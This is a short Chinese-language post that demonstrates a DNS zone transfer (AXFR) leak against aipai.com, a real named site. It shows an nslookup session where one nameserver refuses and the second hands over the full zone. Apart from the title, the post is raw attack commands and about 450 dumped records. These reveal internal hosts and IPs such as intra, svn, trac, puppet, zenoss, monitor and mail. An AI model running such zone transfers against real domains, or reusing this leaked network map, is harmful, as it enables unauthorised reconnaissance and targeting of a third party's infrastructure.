关于DNS域传送漏洞 :DNS域传送泄露漏洞详解
爱拍DNS域传送漏洞演示:
nslookup命令:
> server 8.8.8.8
(root) nameserver = E.ROOT-SERVERS.NET
(root) nameserver = F.ROOT-SERVERS.NET
(root) nameserver = G.ROOT-SERVERS.NET
(root) nameserver = H.ROOT-SERVERS.NET
(root) nameserver = I.ROOT-SERVERS.NET
(root) nameserver = J.ROOT-SERVERS.NET
(root) nameserver = K.ROOT-SERVERS.NET
(root) nameserver = L.ROOT-SERVERS.NET
(root) nameserver = M.ROOT-SERVERS.NET
(root) nameserver = A.ROOT-SERVERS.NET
(root) nameserver = B.ROOT-SERVERS.NET
(root) nameserver = C.ROOT-SERVERS.NET
(root) nameserver = D.ROOT-SERVERS.NET
Default Server: [8.8.8.8]
Address: 8.8.8.8
> aipai.com
Server: [8.8.8.8]
Address: 8.8.8.8
DNS request timed out.
timeout was 2 seconds.
Non-authoritative answer:
aipai.com nameserver = ns2.aipai.com
aipai.com nameserver = ns1.aipai.com
> server ns1.aipai.com
Default Server: ns1.aipai.com
Address: 121.10.241.93
> ls aipai.com
[ns1.aipai.com]
*** Can't list domain aipai.com: Query refused
> server ns2.aipai.com
Default Server: ns2.aipai.com
Address: 121.10.241.94
> ls aipai.com
[ns2.aipai.com]
*** ls: error receiving zone transfer:
result: NOERROR, answers = 768, authority = 0, additional = 0
*** Can't list domain aipai.com: Unspecified error
> ls aipai.com > aipai.txt
[ns2.aipai.com]
#
Received 454 records.
C:\Documents and Settings\Administrator\aipai.txt
> ls aipai.com
[ns2.aipai.com]
aipai.com. NS server = ns1.aipai.com
aipai.com. NS server = ns2.aipai.com
aipai.com. A 121.10.241.70
aipai.com. A 121.10.241.89
17gy A 121.10.241.126
a1 A 61.130.97.36
a2 A 61.130.97.37
apas A 121.10.241.82
b1 A 61.130.97.36
b2 A 61.130.97.37
b3 A 122.225.115.67
b4 A 122.225.115.68
b5 A 122.225.115.72
b6 A 122.225.115.73
b7 A 122.225.115.71
bbs A 121.10.241.85
bbsrv A 121.10.241.75
bgpupload A 180.185.0.123
bus A 121.10.241.69
bus2 A 121.10.241.68
c1 A 61.130.97.36
c10 A 61.130.97.248
c10 A 61.130.97.249
c11 A 60.190.28.56
c11 A 61.130.97.250
c11 A 61.130.97.251
c11 A 61.164.79.228
c11 A 61.164.79.229
c12 A 60.190.28.53
c12 A 60.190.28.54
c12 A 60.190.28.59
c12 A 61.164.79.226
c12 A 61.164.79.227
c12 A 61.164.79.231
c12 A 61.164.79.232
c14 A 61.130.97.38
c2 A 61.130.97.37
c3 A 122.225.115.67
c4 A 122.225.115.68
c5 A 122.225.115.72
c6 A 122.225.115.73
c7 A 122.225.115.71
c8 A 122.225.115.75
c8 A 122.225.115.76
c9 A 122.225.115.79
c9 A 122.225.115.80
comment A 121.10.241.73
bbs.corp A 121.10.241.111
crashrpt A 121.10.241.93
da01 A 121.10.241.109
da02 A 121.10.241.109
da03 A 121.10.241.109
da04 A 121.10.241.105
dashi A 121.10.241.75
download A 121.10.241.91
fa1 A 121.10.241.91
fa2 A 121.10.241.92
fb1 A 121.10.241.91
fb10 A 121.10.241.100
fb11 A 121.10.241.101
fb12 A 121.10.241.102
fb13 A 121.10.241.103
fb14 A 121.10.241.104
fb2 A 121.10.241.92
fb3 A 121.10.241.93
fb4 A 121.10.241.94
fb5 A 121.10.241.95
fb6 A 121.10.241.96
fb7 A 121.10.241.97
fb8 A 121.10.241.98
fb9 A 121.10.241.99
fc1 A 121.10.241.91
fc10 A 121.10.241.100
fc11 A 121.10.241.101
fc12 A 121.10.241.76
fc13 A 121.10.241.103
fc14 A 121.10.241.104
fc2 A 121.10.241.92
fc3 A 121.10.241.93
fc4 A 121.10.241.94
fc5 A 121.10.241.95
fc6 A 121.10.241.96
fc7 A 121.10.241.97
fc8 A 121.10.241.98
fc9 A 121.10.241.99
fk001 A 122.226.73.51
fkin001 A 122.226.100.234
fp1 A 121.10.241.91
fp10 A 121.10.241.100
fp11 A 121.10.241.101
fp12 A 121.10.241.102
fp13 A 121.10.241.103
fp14 A 121.10.241.104
fp2 A 121.10.241.92
fp3 A 121.10.241.93
fp4 A 121.10.241.94
fp5 A 121.10.241.95
fp6 A 121.10.241.96
fp7 A 121.10.241.97
fp8 A 121.10.241.98
fp9 A 121.10.241.99
fs1 A 121.10.241.91
fs10 A 121.10.241.100
fs11 A 121.10.241.101
fs12 A 121.10.241.102
fs13 A 121.10.241.103
fs14 A 121.10.241.104
fs2 A 121.10.241.92
fs3 A 121.10.241.93
fs4 A 121.10.241.94
fs5 A 121.10.241.95
fs6 A 121.10.241.96
fs7 A 121.10.241.97
fs8 A 121.10.241.98
fs9 A 121.10.241.99
fu1 A 121.10.241.87
fu10 A 121.10.241.100
fu11 A 121.10.241.101
fu12 A 121.10.241.102
fu13 A 121.10.241.103
fu14 A 121.10.241.104
fu2 A 121.10.241.92
fu3 A 121.10.241.93
fu4 A 121.10.241.94
fu5 A 121.10.241.95
fu6 A 121.10.241.96
fu7 A 121.10.241.97
fu8 A 121.10.241.98
fu9 A 121.10.241.99
h001 A 115.236.59.82
hb001 A 115.236.59.83
hc1 A 60.55.32.194
hc1 A 60.55.32.195
hc1 A 60.55.32.196
hc1 A 60.55.32.197
hc1 A 60.55.32.199
hc1 A 60.55.32.201
hc1 A 60.190.28.52
hc1 A 61.130.97.247
hc1 A 119.134.253.99
hc1 A 119.134.253.100
hc1 A 119.134.253.101
hc1 A 119.134.253.103
hc1 A 119.134.253.104
hc1 A 119.134.253.105
hc1 A 122.227.254.162
hc1 A 122.227.254.163
hc1 A 122.227.254.165
hc1 A 122.227.254.166
hc1 A 122.227.254.169
hc1 A 122.227.254.170
hh0001 A 122.226.73.50
hh001 A 122.226.73.52
hh002 A 122.226.100.234
hh003 A 122.226.100.232
hh004 A 122.226.73.53
hh005 A 122.226.100.233
hh006 A 122.226.73.51
hh008 A 122.226.100.235
intra A 121.10.241.107
iphone A 61.130.97.242
localhost A 127.0.0.1
mail A 121.10.241.109
monitor A 180.185.0.122
mx01 A 121.10.241.109
nb001 A 118.186.35.29
notify A 121.10.241.80
ns1 A 121.10.241.93
ns11 A 121.10.241.93
ns12 A 121.10.241.94
ns2 A 121.10.241.94
p1 A 121.10.241.91
p10 A 121.10.241.100
p11 A 121.10.241.101
p12 A 121.10.241.102
p14 A 121.10.241.104
p2 A 121.10.241.92
p3 A 121.10.241.93
p4 A 121.10.241.94
p5 A 121.10.241.95
p6 A 121.10.241.96
p7 A 121.10.241.97
p8 A 121.10.241.98
p9 A 121.10.241.99
puppet A 121.10.241.106
rtx A 121.10.241.112
search A 121.10.241.81
star A 121.10.241.85
stats A 121.10.241.73
svn A 121.10.241.107
tc12 A 61.164.79.226
tc12 A 61.164.79.231
trac A 121.10.241.108
u1 A 121.10.241.91
u10 A 121.10.241.100
u11 A 121.10.241.101
u12 A 121.10.241.102
u14 A 121.10.241.104
u2 A 121.10.241.92
u3 A 121.10.241.93
u4 A 121.10.241.94
u5 A 121.10.241.95
u6 A 121.10.241.96
u7 A 121.10.241.97
u8 A 121.10.241.98
u9 A 121.10.241.99
update A 121.10.241.91
urs A 121.10.241.69
web A 122.226.84.158
wshc1 A 60.55.32.198
wshc1 A 119.134.253.98
wshc1 A 119.134.253.102
www A 121.10.241.70
www A 121.10.241.89
www-1 A 121.10.241.71
www-2 A 121.10.241.72
www-3 A 121.10.241.73
www-4 A 121.10.241.74
www1 A 121.10.241.75
www2 A 121.10.241.73
s1.x5 A 122.226.73.52
xwcjq A 121.10.241.116
zenoss A 121.10.241.110